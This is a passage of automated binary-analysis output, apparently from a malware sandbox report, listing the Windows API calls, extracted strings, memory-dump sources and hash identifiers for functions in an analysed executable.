                                                                                                                  • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                  APIs
                                                                                                                  • free.MSVCRT ref: 0040F561
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                  • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$free
                                                                                                                  • String ID: g4@
                                                                                                                  • API String ID: 2888793982-2133833424
                                                                                                                  • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                  • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                  • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                  • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                  • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                  • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 3510742995-2766056989
                                                                                                                  • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                  • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                  • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                  • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                                  • memset.MSVCRT ref: 0040AF18
                                                                                                                  • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1865533344-0
                                                                                                                  • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                  • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                  • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                  • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004144E7
                                                                                                                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                    • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                  • memset.MSVCRT ref: 0041451A
                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1127616056-0
                                                                                                                  • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                  • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                  • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                  • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                  • memset.MSVCRT ref: 0042FED3
                                                                                                                  • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID: sqlite_master
                                                                                                                  • API String ID: 438689982-3163232059
                                                                                                                  • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                  • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                  • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                  • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                  APIs
                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                  • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3917621476-0
                                                                                                                  • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                  • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                  • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                  • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                  • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                  • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                  • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                  • wcscat.MSVCRT ref: 0041101F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 822687973-0
                                                                                                                  • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                  • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                  • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                  • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                  APIs
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7626DF80,?,0041755F,?), ref: 00417452
                                                                                                                  • malloc.MSVCRT ref: 00417459
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7626DF80,?,0041755F,?), ref: 00417478
                                                                                                                  • free.MSVCRT ref: 0041747F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2605342592-0
                                                                                                                  • Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                  • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                  • Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                  • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                                  • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2678498856-0
                                                                                                                  • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                  • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                  • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                  • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Item
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3888421826-0
                                                                                                                  • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                  • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                  • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                  • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00417B7B
                                                                                                                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                  • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3727323765-0
                                                                                                                  • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                  • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                  • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                  • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040F673
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                                  • strlen.MSVCRT ref: 0040F6A2
                                                                                                                  • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2754987064-0
                                                                                                                  • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                  • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                  • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                  • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040F6E2
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                                  • strlen.MSVCRT ref: 0040F70D
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2754987064-0
                                                                                                                  • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                  • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                  • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                  • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00402FD7
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                  • strlen.MSVCRT ref: 00403006
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2754987064-0
                                                                                                                  • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                  • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                  • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                  • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                  • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 764393265-0
                                                                                                                  • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                  • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                  • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                  • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                  APIs
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$System$File$LocalSpecific
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 979780441-0
                                                                                                                  • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                  • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                  • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                  • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                  • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1386444988-0
                                                                                                                  • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                  • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                  • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                  • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: InvalidateMessageRectSend
                                                                                                                  • String ID: d=E
                                                                                                                  • API String ID: 909852535-3703654223
                                                                                                                  • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                  • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                  • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                  • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                  APIs
                                                                                                                  • wcschr.MSVCRT ref: 0040F79E
                                                                                                                  • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                    • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: wcschr$memcpywcslen
                                                                                                                  • String ID: "
                                                                                                                  • API String ID: 1983396471-123907689
                                                                                                                  • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                  • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                  • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                  • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                  • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                  • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointer_memicmpmemcpy
                                                                                                                  • String ID: URL
                                                                                                                  • API String ID: 2108176848-3574463123
                                                                                                                  • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
